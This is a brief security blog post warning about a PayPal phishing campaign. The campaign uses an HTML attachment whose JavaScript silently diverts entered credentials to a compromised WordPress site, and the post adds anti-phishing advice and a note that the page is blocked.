Advanced phishing tactics used to steal PayPal credentials

Phishers are back to using an old tactic in a new fashion to get hold of their victims’ credentials.

One of the first lessons you will learn during anti-phishing training is to hover over the links in a mail to see if they point to the site where you would expect them to point. Although good advice, this is NOT a guarantee that you are going to be safe.

Always visit sites directly, never follow the URLs presented to you in emails or attachments.

Phishing definition

Per Wikipedia:

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

What does this phish do?

As reported by UK malware researcher @dvk01uk, the phishers are using Javascript to send the user to the promised PayPal site while the login credentials are being sent to an entirely different domain.

The javascript runs as soon as the page (HTML attachment) is loaded and intercepts all posts to PayPal.com and diverts them to the actual phishing page to accept all your details, if you are unwise enough to fall for this trick.

In this case, the phish was pointing to PayPal and the phishing page is www[dot]egypt-trips[dot]co which appears to be an unused WordPress site. (We have informed the registrant of the phish, so we hope they will take appropriate measures.)

Blocked

While giving the site owner some time to clean up his site, users of Malwarebytes Anti-Malware Premium will find that the phishing page is blocked if they have the Malicious Website Protection enabled.

protection

Link

The original blogpost about this particular phish, including screenshots and code snippets, can be found here: Very unusual PayPal phishing attack

Pieter Arntz